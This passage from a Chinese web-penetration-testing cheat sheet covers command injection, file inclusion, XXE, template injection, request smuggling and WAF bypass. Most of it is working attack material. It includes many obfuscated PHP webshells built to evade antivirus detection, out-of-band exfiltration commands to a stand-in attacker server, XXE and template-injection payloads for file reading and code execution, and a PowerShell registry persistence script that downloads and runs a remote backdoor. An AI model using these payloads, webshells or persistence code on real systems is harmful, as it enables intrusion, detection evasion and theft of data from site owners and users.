分享位置
转码服务
在线翻译
图片加载与下载或者任意下载文件的地方，同时也可能存在任意文件读取（任意文件下载）
收藏功能
api调用，这里也可能存在大量漏洞
```

### 代码审计点

```
file_get_contents,fsockopen,curl_exec
```

## 0x05命令注入

### 常见危险函数

#### **PHP**

* system
* exec
* passthru
* shell\_exec
* popen
* proc\_open

#### **Python**

* system
* popen
* subprocess.call
* spawn

#### Java

* java.lang.Runtime.getRuntime().exec(command)

### 常见注入方式

* 分号分割
* `||` `&&` `&` 分割
* `|` 管道符
* `\r\n` `%d0%a0` 换行
* 反引号解析
* `$()` 替换

#### 无回显技巧

* bash反弹shell
* DNS带外数据
* http带外

  &#x20;`curl http://evil-server/$(whoami)`

  &#x20;`wget http://evil-server/$(whoami)`
* 无带外时利用 `sleep` 或其他逻辑构造布尔条件

### **常见绕过方式**

#### **空格绕过**

* `<` 符号 `cat<123`
* `\t` / `%09`
* `${IFS}` 其中{}用来截断，比如cat$IFS2会被认为IFS2是变量名。另外，在后面加个$可以起到截断的作用，一般用$9，因为$9是当前系统shell进程的第九个参数的持有者，它始终为空字符串

#### **黑名单绕过**

* `a=l;b=s;$a$b`
* base64 `echo "bHM=" | base64 -d`
* `/?in/?s` => `/bin/ls`
* 连接符 `cat /etc/pass'w'd`
* 未定义的初始化变量 `cat$x /etc/passwd`

#### **长度限制绕过**

```
>wget\
>foo.\
>com
ls -t>a
sh a
```

### 常用符号

#### **命令分隔符**

* `%0a` / `%0d` / `\n` / `\r`
* `;`
* `&` / `&&`

#### **通配符**

* `*` 0到无穷个任意字符
* `?` 一个任意字符
* `[ ]` 一个在括号内的字符，e.g. `[abcd]`
* `[ - ]` 在编码顺序内的所有字符
* `[^ ]` 一个不在括号内的字符

#### **防御**

* 不使用时禁用相应函数
* 尽量不要执行外部的应用程序或命令
* 做输入的格式检查
* 转义命令中的所有shell元字符

  shell元字符包括 `#&;`,|\*?\~<>^()\[]{}$\`

## 0x06目录穿越

### Nginx Off by Slash

* `https://vuln.site.com/files../`

### URL参数

* `../`
* `..\`
* `..;/`

### UNC Bypass

* `\\localhost\c$\windows\win.ini`

### 过滤绕过

* 单次替换

  `...//`
* URL编码
* 16位Unicode编码

  `\u002e`
* 超长UTF-8编码

  `\%e0%40%ae`

## 0x07文件读取

### 读取可能有敏感信息的文件

#### 用户目录下的敏感文件

* .bash\_history
* .zsh\_history
* .profile
* .bashrc
* .gitconfig
* .viminfo
* passwd

#### 应用的配置文件

* /etc/apache2/apache2.conf
* /etc/nginx/nginx.conf

#### 应用的日志文件

* /var/log/apache2/access.log
* /var/log/nginx/access.log

#### 站点目录下的敏感文件

* .svn/entries
* .git/HEAD
* WEB-INF/web.xml
* .htaccess

#### 特殊的备份文件

* .swp
* .swo
* .bak
* index.php\~
* ...

#### Python的Cache

* `__pycache__\__init__.cpython-35.pyc`

## 0x08文件上传

### 文件类型检测绕过

#### **更改请求绕过**

有的站点仅仅在前端检测了文件类型，这种类型的检测可以直接修改网络请求绕过。 同样的，有的站点在后端仅检查了HTTP Header中的信息，比如 `Content-Type` 等，这种检查同样可以通过修改网络请求绕过。

#### **Magic检测绕过**

有的站点使用文件头来检测文件类型，这种检查可以在Shell前加入对应的字节以绕过检查。几种常见的文件类型的头字节如下表所示

| 类型  | 二进制值                          |
| --- | ----------------------------- |
| JPG | FF D8 FF E0 00 10 4A 46 49 46 |
| GIF | 47 49 46 38 39 61             |
| PNG | 89 50 4E 47                   |
| TIF | 49 49 2A 00                   |
| BMP | 42 4D                         |

#### **后缀绕过**

部分服务仅根据后缀、上传时的信息或Magic Header来判断文件类型，此时可以绕过。

php由于历史原因，部分解释器可能支持符合正则 `/ph(p[2-7]?|t(ml)?)/` 的后缀，如 `php` / `php5` / `pht` / `phtml` / `shtml` / `pwml` / `phtm` 等 可在禁止上传php文件时测试该类型。

jsp引擎则可能会解析 `jspx` / `jspf` / `jspa` / `jsw` / `jsv` / `jtml` 等后缀，asp支持 `asa` / `asax` / `cer` / `cdx` / `aspx` / `ascx` / `ashx` / `asmx` / `asp{80-90}` 等后缀。

除了这些绕过，其他的后缀同样可能带来问题，如 `vbs` / `asis` / `sh` / `reg` / `cgi` / `exe` / `dll` / `com` / `bat` / `pl` / `cfc` / `cfm` / `ini` 等。

#### **系统命名绕过**

在Windows系统中，上传 `index.php.` 会重命名为 `.` ，可以绕过后缀检查。 也可尝试 `index.php%20` ， `index.php:1.jpg` `index.php::$DATA` 等。 在Linux系统中，可以尝试上传名为 `index.php/.` 或 `./aa/../index.php/.` 的文件

#### **.user.ini**

在php执行的过程中，除了主 `php.ini` 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$\_SERVER\['DOCUMENT\_ROOT'] 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。 `.user.ini` 中可以定义除了PHP\_INI\_SYSTEM以外的模式的选项，故可以使用 `.user.ini` 加上非php后缀的文件构造一个shell，比如 `auto_prepend_file=01.gif` 。

### **WAF绕过**

有的waf在编写过程中考虑到性能原因，只处理一部分数据，这时可以通过加入大量垃圾数据来绕过其处理函数。

另外，Waf和Web系统对 `boundary` 的处理不一致，可以使用错误的 `boundary` 来完成绕过。

#### **竞争上传绕过**

有的服务器采用了先保存，再删除不合法文件的方式，在这种服务器中，可以反复上传一个会生成Web Shell的文件并尝试访问，多次之后即可获得Shell。

### 攻击技巧

#### **Apache重写GetShell**

Apache可根据是否允许重定向考虑上传.htaccess

内容为

{% tabs %}
{% tab title=".htaccess" %}

```
AddType application/x-httpd-php .png
php_flag engine 1
```

{% endtab %}
{% endtabs %}

就可以用png或者其他后缀的文件做php脚本了

#### **软链接任意读文件**

上传的压缩包文件会被解压的文件时，可以考虑上传含符号链接的文件 若服务器没有做好防护，可实现任意文件读取的效果

## 0x09文件包含

### 基础

常见的文件包含漏洞的形式为 `<?php include("inc/" . $_GET['file']); ?>`

考虑常用的几种包含方式为

* 同目录包含 `file=.htaccess`
* 目录遍历 `?file=../../../../../../../../../var/lib/locate.db`
* 日志注入 `?file=../../../../../../../../../var/log/apache/error.log`
* 利用 `/proc/self/environ`

其中日志可以使用SSH日志或者Web日志等多种日志来源测试

### 触发Sink

#### PHP

* include
  * 在包含过程中出错会报错，不影响执行后续语句
* include\_once
  * 仅包含一次
* require
  * 在包含过程中出错，就会直接退出，不执行后续语句
* require\_once

### 绕过技巧

常见的应用在文件包含之前，可能会调用函数对其进行判断，一般有如下几种绕过方式

#### **url编码绕过**

如果WAF中是字符串匹配，可以使用url多次编码的方式可以绕过

#### **特殊字符绕过**

* 某些情况下，读文件支持使用Shell通配符，如 `?` `*` 等
* url中 使用 `?` `#` 可能会影响include包含的结果
* 某些情况下，unicode编码不同但是字形相近的字符有同一个效果

#### **%00截断**

几乎是最常用的方法，条件是magic\_quotes\_gpc打开，而且php版本小于5.3.4。

#### **长度截断**

Windows上的文件名长度和文件路径有关。具体关系为：从根目录计算，文件路径长度最长为259个bytes。

msdn定义 `#define MAX_PATH 260`，其中第260个字符为字符串结尾的 `\0` ，而linux可以用getconf来判断文件名长度限制和文件路径长度限制。

获取最长文件路径长度：getconf PATH\_MAX /root 得到4096 获取最长文件名：getconf NAME\_MAX /root 得到255

那么在长度有限的时候，`././././` (n个) 的形式就可以通过这个把路径爆掉

在php代码包含中，这种绕过方式要求php版本 < php 5.2.8

#### **伪协议绕过**

* 远程包含: 要求 `allow_url_fopen=On` 且 `allow_url_include=On` ， payload为 `?file=[http|https|ftp]://websec.wordpress.com/shell.txt` 的形式
* PHP input: 把payload放在POST参数中作为包含的文件，要求 `allow_url_include=On` ，payload为 `?file=php://input` 的形式
* Base64: 使用Base64伪协议读取文件，payload为 `?file=php://filter/convert.base64-encode/resource=index.php` 的形式
* data: 使用data伪协议读取文件，payload为 `?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=` 的形式，要求 `allow_url_include=On`

#### **协议绕过**

`allow_url_fopen` 和 `allow_url_include` 主要是针对 `http` `ftp` 两种协议起作用，因此可以使用SMB、WebDav协议等方式来绕过限制。

## 0x10XXE

### 攻击方式

#### **拒绝服务攻击**

```
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>
```

若解析过程非常缓慢，则表示测试成功，目标站点可能有拒绝服务漏洞。 具体攻击可使用更多层的迭代或递归，也可引用巨大的外部实体，以实现攻击的效果。

#### **文件读取**

```
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
```

#### **SSRF**

```
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data (#ANY)>
]>
<data>4</data>
```

#### **RCE**

```
<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
   <core id="test101">
      <description>&xxe;</description>
   </core>
</catalog>
```

#### **XInclude**

```
<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>
```

## 0x11模版注入

### 测试方法

* 确定使用的引擎
* 查看引擎相关的文档，确定其安全机制以及自带的函数和变量
* 需找攻击面，尝试攻击

### 测试用例

* 简单的数学表达式，`{{ 7+7 }} => 14`
* 字符串表达式 `{{ "ajin" }} => ajin`
  * Ruby
    * `<%= 7 * 7 %>`
    * `<%= File.open('/etc/passwd').read %>`
  * Java
    * `${7*7}`
  * Twig
    * `{{7*7}}`
  * Smarty
    * `{php}echo 'id';{/php}`
  * AngularJS
    * `$eval('1+1')`
  * Tornado
    * 引用模块 `{% import module %}`=> `{% import os %}{{ os.popen("whoami").read() }}`
  * Flask/Jinja2
    * `{{ config }}`
    * `{{ config.items()`}}
    * `{{get_flashed_messages.__globals__['current_app'].config}}`
    * `{{''.__class__.__mro__[-1].__subclasses__()}}`
    * `{{ url_for.__globals__['__builtins__'].__import__('os').system('ls') }}`
    * `{{ request.__init__.__globals__['__builtins__'].open('/etc/passwd').read() }}`
  * Django
    * `{{ request }}`
    * `{% debug %}`
    * `{% load module %}`
    * `{% include "x.html" %}`
    * `{% extends "x.html" %}`

## 0x12Xpath注入

### Xpath注入攻击原理

> XPath注入攻击主要是通过构建特殊的输入，这些输入往往是XPath语法中的一些组合，这些输入将作为参数传入Web 应用程序，通过执行XPath查询而执行入侵者想要的操作，下面以登录验证中的模块为例，说明 XPath注入攻击的实现原理。

在Web 应用程序的登录验证程序中，一般有用户名（username）和密码（password） 两个参数，程序会通过用户所提交输入的用户名和密码来执行授权操作。若验证数据存放在XML文件中，其原理是通过查找user表中的用户名 （username）和密码（password）的结果来进行授权访问，

例存在user.xml文件如下：

```
<users>
     <user>
         <firstname>Ben</firstname>
         <lastname>Elmore</lastname>
         <loginID>abc</loginID>
         <password>test123</password>
     </user>
     <user>
         <firstname>Shlomy</firstname>
         <lastname>Gantz</lastname>
         <loginID>xyz</loginID>
         <password>123test</password>
     </user>
```

则在XPath中其典型的查询语句为： `//users/user[loginID/text()='xyz'and password/text()='123test']`

但是，可以采用如下的方法实施注入攻击，绕过身份验证。如果用 户传入一个 login 和 password，例如 `loginID = 'xyz' 和 password = '123test'` ，则该查询语句将返回 true。但如果用户传入类似 `' or 1=1 or ''='` 的值，那么该查询语句也会得到 true 返回值，因为 XPath 查询语句最终会变成如下代码：`//users/user[loginID/text()=''or 1=1 or ''='' and password/text()='' or 1=1 or ''='']`

这个字符串会在逻辑上使查询一直返回 true 并将一直允许攻击者访问系统。攻击者可以利用 XPath 在应用程序中动态地操作 XML 文档。攻击完成登录可以再通过XPath盲入技术获取最高权限帐号和其它重要文档信息。

## 0x13逻辑漏洞 / 业务漏洞

### 简介

逻辑漏洞是指由于程序逻辑不严导致一些逻辑分支处理错误造成的漏洞。

在实际开发中，因为开发者水平不一没有安全意识，而且业务发展迅速内部测试没有及时到位，所以常常会出现类似的漏洞。

### 安装逻辑

* 查看能否绕过判定重新安装
* 查看能否利用安装文件获取信息
* 看能否利用更新功能获取信息

#### 交易

#### 购买

* 修改支付的价格
* 修改支付的状态
* 修改购买数量为负数
* 修改金额为负数
* 重放成功的请求
* 并发数据库锁处理不当

#### 业务风控

* 刷优惠券
* 套现

#### 账户

#### 注册

* 覆盖注册
* 尝试重复用户名
* 注册遍历猜解已有账号

#### 密码

* 密码未使用哈希算法保存

#### 邮箱用户名

* 前后空格
* 大小写变换

#### Cookie

* 包含敏感信息
* 未验证合法性可伪造

#### 手机号用户名

* 前后空格
* +86

#### 登录

* 撞库
* 账号劫持
* 恶意尝试帐号密码锁死账户

#### 找回密码

* 重置任意用户密码
* 密码重置后新密码在返回包中
* Token验证逻辑在前端
* X-Forwarded-Host处理不正确

#### 修改密码

* 越权修改密码
* 修改密码没有旧密码验证

#### 申诉

* 身份伪造
* 逻辑绕过

#### 更新

* ORM更新操作不当可更新任意字段
* 权限限制不当可以越权修改

#### 信息查询

* 权限限制不当可以越权查询
* 用户信息ID可以猜测导致遍历

#### 2FA

* 重置密码后自动登录没有2FA
* OAuth登录没有启用2FA
* 2FA可爆破
* 2FA有条件竞争
* 修改返回值绕过
* 激活链接没有启用2FA
* 可通过CSRF禁用2FA

#### 验证码

* 验证码可重用
* 验证码可预测
* 验证码强度不够
* 验证码无时间限制或者失效时间长
* 验证码无猜测次数限制
* 验证码传递特殊的参数或不传递参数绕过
* 验证码可从返回包中直接获取
* 验证码不刷新或无效
* 验证码数量有限
* 验证码在数据包中返回
* 修改Cookie绕过
* 修改返回包绕过
* 验证码在客户端生成或校验
* 验证码可OCR或使用机器学习识别
* 验证码用于手机短信/邮箱轰炸

#### Session

* Session机制
* Session猜测 / 爆破
* Session伪造
* Session泄漏
* Session Fixation

#### 越权

* 未授权访问
  * 水平越权
    * 攻击者可以访问与他拥有相同权限的用户的资源权限类型不变，ID改变
  * 垂直越权
    * 低级别攻击者可以访问高级别用户的资源权限ID不变，类型改变
* 交叉越权
  * 权限ID改变，类型改变

#### 随机数安全

* 使用不安全的随机数发生器
* 使用时间等易猜解的因素作为随机数种子

#### 其他

* 用户/订单/优惠券等ID生成有规律，可枚举
* 接口无权限、次数限制
* 加密算法实现误用
* 执行顺序
* 敏感信息泄露

### 配置安全

* 弱密码
  * 位数过低字符集小为常用密码个人信息相关手机号生日姓名用户名使用键盘模式做密码
* 敏感文件泄漏
  * .git.svn
* 数据库
  * Mongo/Redis等数据库无密码且没有限制访问
* 加密体系
  * 在客户端存储私钥
* 三方库/软件
  * 公开漏洞后没有及时更新

## 0x14中间件

* &#x20;IIS
  * IIS 6.0
  * &#x20;IIS 7.0-7.5 / Nginx <= 0.8.37
  * PUT漏洞
  * Windows特性
  * 文件名猜解
  * 参考链接
    * [利用Windows特性高效猜测目录](https://xz.aliyun.com/t/2318)
    * [Uploading web.config for Fun and Profit 2](https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-profit-2/)
* Apache
  * 后缀解析
  * .htaccess
  * 目录遍历
  * CVE-2017-15715
  * lighttpd
  * 参考链接
    * [Apache 上传绕过](https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html)
* 4.15.3. Nginx
  * Fast-CGI关闭
  * Fast-CGI开启
  * CVE-2013-4547
  * 配置错误
  * 参考链接
    * [CVE-2013-4547 Nginx解析漏洞深入利用及分析](http://www.91ri.org/9064.html)

## 0x15Web Cache欺骗攻击

### 漏洞利用

攻击者欺骗用户访问 `http://www.example.com/home.php/logo.png?www.myhack58.com` ,导致含有用户个人信息的页面被缓存，从而能被公开访问到。更严重的情况下，如果返回的内容包含session标识、安全问题的答案，或者csrf token。这样攻击者能接着获得这些信息，因为通常而言大部分网站静态资源都是公开可访问的。

### 漏洞存在的条件

漏洞要存在，至少需要满足下面两个条件：

1. web cache功能根据扩展进行保存，并忽略caching header;
2. 当访问如 `http://www.example.com/home.php/non-existent.css` 不存在的页面，会返回 `home.php` 的内容。

## 0x16HTTP 请求走私

### 攻击

#### **CL不为0的GET请求**

当前端服务器允许GET请求携带请求体，而后端服务器不允许GET请求携带请求体，它会直接忽略掉GET请求中的 `Content-Length` 头，不进行处理。例如下面这个例子：

```
GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 44\r\n
​
GET /secret HTTP/1.1\r\n
Host: example.com\r\n
\r\n
```

前端服务器处理了 `Content-Length` ，而后端服务器没有处理 `Content-Length` ，基于pipeline机制认为这是两个独立的请求，就造成了漏洞的发生。

#### **CL-CL**

根据RFC 7230，当服务器收到的请求中包含两个 `Content-Length` ，而且两者的值不同时，需要返回400错误，但是有的服务器并没有严格实现这个规范。这种情况下，当前后端各取不同的 `Content-Length` 值时，就会出现漏洞。例如：

```
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
​
12345\r\n
a
```

这个例子中a就会被带入下一个请求，变为 `aGET / HTTP/1.1\r\n` 。

#### **CL-TE**

CL-TE指前端服务器处理 `Content-Length` 这一请求头，而后端服务器遵守RFC2616的规定，忽略掉 `Content-Length` ，处理 `Transfer-Encoding` 。例如：

```
POST / HTTP/1.1\r\n
Host: example.com\r\n
...
Content-Length: 4\r\n
Transfer-Encoding: chunked\r\n
\r\n
12\r\n
aPOST / HTTP/1.1\r\n
\r\n
0\r\n
\r\n
```

#### **TE-TE**

TE-TE指前后端服务器都处理 `Transfer-Encoding` 请求头，但是在容错性上表现不同，例如有的服务器可能会处理 `Transfer-encoding` ，测试例如：

```
POST / HTTP/1.1\r\n
Host: example.com\r\n
...
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-encoding: cow\r\n
\r\n
5c\r\n
aPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n
```

## 0x17RPO相对路径覆盖攻击


# 未授权访问汇总

暂时先放这些

| 服务                   | 端口        |
| -------------------- | --------- |
| LDAP                 | 389       |
| rsync                | 873       |
| nsf                  | 2049      |
| ZooKeeper            | 2181      |
| Docker Remote API    | 2375      |
| VNC                  | 5900、5901 |
| CouchDB              | 5984      |
| Redis                | 6379      |
| Jenkins              | 8080      |
| JBoss                | 8080      |
| Hadoop Yarn REST API | 8088、8090 |
| Jupyter Notebook     | 8888      |
| memcache             | 11211     |
| MongoDB              | 27017     |
| Elasticsearch        | 9200      |
| Memcached            | 11211     |
| CouchDB              | 5984      |
| Zabbix               | 9003      |
| Atlassian Crowd      | 8095      |
| NFS                  | 22        |
| Spring Boot Actuator | 8090      |
| Active MQ            | 8161      |
| 深信服EDR终端检测响应平台免登陆    |           |


# Bypass Waf&\&Webshell免杀


# Bypass Waf

## 0x01WAF部署模式

* DNS解析
* 旁路
* 串联
  * 反向代理模式
  * 透明代理模式
* 软件嵌入中间件 + 检测引擎模式

## **0x02**WAF绕过原理

### 架构

#### MYSQL

**超长数据包BYPASS**

GET型请求转POST型 Content-Length 头长度大于4008 正常参数放置在脏数据后面，否则无效

### 规则缺陷（黑白名单）

#### MYSQL特性

```
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin**

位置①
可利用其他控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号：/**/、#test%0d%0a、 --+a
可利用数学运算以及数据类型：**news_id=1.1，**news_id=1E0，news_id=\N

位置②
可利用其他控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0。
可利用注释符号：/**/、 #test%0d%0a、 --+a
可利用括号：union(select 1,2)

位置③
可利用其他控制字符替换空格：%09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号：/**/、 #test%0d%0a、 --+a
可利用其他符号：+ 、- 、 ~ 、!、@

位置④
可利用其他控制字符替换空格： %09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号： /**/、#test%0d%0a、 --+a
可利用数学运算以及数据类型：
union select user(),2.0from admin
union select user(),8e0from admin
union select user(),\Nfrom admin

位置⑤
可利用其他控制字符替换空格： %09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号： /**/、#test%0d%0a、--+a
`号：union select 1 schema_name from`information_schema`.SCHEMATA limit 0,1)

内联注释：**union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/ limit 0,1)
{号： **union select 1,(select(schema_name)from {x information_schema.SCHEMATA} limit 0,1)
(号：**union select 1,(select(schema_name)from(information_schema.SCHEMATA) limit 0,1)
```

#### MYSQL

### 协议

{% embed url="<https://www.freebuf.com/news/193659.html>" %}

## 0x03参考

{% embed url="<https://github.com/4rat/sqlmap_chunked_proxy>" %}


# PHPWebshell免杀

## 0x01查杀原理

* 静态特征：字符 语义分析 （混淆）
* 客户端服务端交互流量日志（流量加密 + 混淆）
* Opcode rasp技术
* 机器学习、深度学习算法（像正常php文件）

## 0x02免杀

### 字符串变形

```
ucwords() //函数把字符串中每个单词的首字符转换为大写。
ucfirst() //函数把字符串中的首字符转换为大写。
trim() //函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() //函数把字符串的一部分替换为另一个字符串
substr() //函数返回字符串的一部分。
strtoupper() //函数把字符串转换为大写。
strtolower() //函数把字符串转换为小写。
strtok() //函数把字符串分割为更小的字符串
base64_encode()  字符串base64编码
base64_decode()     字符串base64解码
urlencode()   字符串url编码
urldecode()   字符串url解码
bin2hex()   把 ASCII 字符的字符串转换为十六进制值。
hex2bin()   把十六进制值的字符串转换为 ASCII 字符。
chr()   从指定的 ASCII 值返回字符。
ord()   返回字符串中第一个字符的 ASCII 值。
explode()   把字符串打散为数组。
implode()   返回由数组元素组合成的字符串。
parse_str() 把查询字符串解析到变量中。
str_ireplace()  替换字符串中的一些字符（对大小写不敏感）。
str_replace()   替换字符串中的一些字符（对大小写敏感）。
str_repeat()    把字符串重复指定的次数。
str_rot13() 对字符串执行 ROT13 编码。
str_shuffle()   随机地打乱字符串中的所有字符。
str_split() 把字符串分割到数组中。
strip_tags()    剥去字符串中的 HTML 和 PHP 标签。
stripos()   返回字符串在另一字符串中第一次出现的位置（对大小写不敏感）。
stristr()   查找字符串在另一字符串中第一次出现的位置（大小写不敏感）。
strlen()    返回字符串的长度。
strpos()    返回字符串在另一字符串中第一次出现的位置（对大小写敏感）。
strrev()    反转字符串。
strripos()  查找字符串在另一字符串中最后一次出现的位置（对大小写不敏感）。
strrpos()   查找字符串在另一字符串中最后一次出现的位置（对大小写敏感）。
strstr()    查找字符串在另一字符串中的第一次出现（对大小写敏感）。
```

### 注释

```
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // 密码-7
```

### 自定义函数

```
<?php 
function kdog($a){
    $a($_POST['x']);
}
kdog(assert);
?>
​
​
<?php
function test($a){
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func.=$func.$arr[$i];
}
$func=substr($func,-6);
$func($a);
}
test($_REQUEST['x']);
?>
```

### 回调函数

```
call_user_func_array()
call_user_func()
array_filter() 
array_walk()  
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_var_array() 
uasort() 
uksort() 
array_reduce()
array_walk() 
array_walk_recursive()
​
​
<?php 
forward_static_call_array(assert,array($_POST[x]));
?>
​
​
<?php
function test($a,$b){
    array_map($a,$b);
}
test(assert,array($_POST['x']));
?>
​
​
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
```

### 特殊字符干扰（\ null ‘’）

```
<?php
function dog($a){
    \assert($a);
}
dog($_POST[x]);
?>
​
<?php
$a = $_POST['a'];
$b = "\n";
eval($b.=$a);
?>
​
<?php
​
$name = $_GET['name'];
​
$name1=$name2= '';
​
eval($name1.$name2.$name);
​
?>
​
​
<?php
$a = $_GET['a'];
$c = null;
eval(''.$c.$a);
​
?>
```

### 数组

```
<?php
$a = substr_replace("assexx","rt",4);
$b=[''=>$a($_POST['q'])];
?>
多维数组
<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = array('a' => $b($_POST['q'])));
?>
​
​
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['n985de9'];
if (isset($s22)) {
    eval($s21($s22));
}
```

### 类的析构

```
<?php 
​
class me
{
  public $a = '';
  function __destruct(){
​
    assert("$this->a");
  }
}
​
$b = new me;
$b->a = $_POST['x'];
​
?>
```

### 编码 异或 取反 自增

```
<?php
$a = base64_decode("YXNz+ZX____J____0");
$a($_POST[x]);
?>
异或
<?php
$a= ("!"^"@").'ssert';
$a($_POST[x]);
?>
​
​
<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);
​
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
​
$_=$$____;
$___(base64_decode($_[_])); // ASSERT($_POST[_]);
​
​
​
$y=~督耽孩^'(1987)';
$y($_POST[1987]);
上述的代码需要以GBK的方式保存,其中的$y的值为assert，这样就是一个典型的webshell了。
还有如下这种：
$x=~Ÿ¬¬º•«;
$x($_POST[~¹¹ÏÏÏÏ]);
上述的代码需要以ISO-8859-15保存，其中的$x为assert,而~¹¹ÏÏÏÏ是FF0000。
```

### $GPC

```
@eval($GLOBALS['_POST']['op']);
@eval($_FILE['name']);
```

### 变量覆盖

```
<?php 
 $a=1;
$b=$_POST;
extract($b);
print_r(`$a`)?>
a=dir
​
​
<?php  $a=1;$b="a=".$_GET['a'];parse_str($b);print_r(`$a`)?>
```

### Php7.1 之后的webshell

#### 进制转换

```
$liner = "pr"."e"."g_"."re"."p"."l"."ace";
$liner("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28",php_code);
其中\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28其实为eval(gzuncompress(base64_decode(也达到了隐藏敏感函数的目的。
```

#### 反序列化

```
class foo{
    public $data="text";
    function __destruct()
    {
        eval($this->data);
    }
}
$file_name=$_GET['id'];
unserialize($file_name);
```

#### 利用文件名

{% tabs %}
{% tab title="no\_assert.php" %}

```
<?php
${"function"}=substr(__FILE__,-10,-4);;
${"command"}=$_POST[cmd];
$function($command);
```

{% endtab %}
{% endtabs %}

#### 自定义加密

```
function decode($string) {
    $result = '';
    for($index=0;$index<strlen($string);$index += 1) {
        $result .= chr(ord($string[$index])-3);
    }
    return $result;
}
$b = create_function('',decode("Chydo+'bSRVW^fpg`,>"));
$b();
```

#### 加密混淆工具

Screw phpjm，phpjiami weevely

## 0x03持久化

### 不死马

Php while

关闭apache 设置不可写 反不死马脚本

### 计划任务

At schtask/ crontab

### Powershell

```
$autorunKeyName = "Windows Powershell"
$autorunKeyVal = "powershell.exe -nop -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1');Backd00r-webshell.ps1"""
$autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
if (-not $autoruns.$autorunKeyName) {
    New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) {
